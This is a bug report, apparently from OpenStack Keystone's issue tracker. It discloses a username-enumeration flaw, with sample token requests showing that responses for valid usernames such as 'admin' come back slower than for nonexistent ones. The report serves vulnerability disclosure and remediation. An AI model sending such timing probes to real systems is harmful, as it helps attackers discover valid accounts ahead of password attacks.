OpenStack Identity (keystone)

Bug #1795800
Comment #0

Comment 0 for bug 1795800

Revision history for this message

Andy Ngo (andyngo) wrote on 2018-10-03: Username enumeration via response timing difference

The response times for POST /v3/auth/tokens are significantly higher for valid usernames compared to those of invalid ones, making it possible to enumerate users on the system.

Examples:

# For invalid username
+ Request
POST /v3/auth/tokens HTTP/1.1
Host: hostname:5000
Connection: close
Content-Length: 141
Content-Type: application/json

{"auth":{"identity":{"methods": ["password"],"password":{"user":{"name": "nonexisting","domain":{"name": "Default"},"password": "devstacker"}}}}}

+ Response Time: <150ms

# For valid username ('admin' in this case)
+ Request
POST /v3/auth/tokens HTTP/1.1
Host: hostname:5000
Connection: close
Content-Length: 139
Content-Type: application/json

{"auth":{"identity":{"methods": ["password"],"password":{"user":{"name": "admin","domain":{"name": "Default"},"password": "devstacker"}}}}}

+ Response time: >600ms

# Tested version
v3.8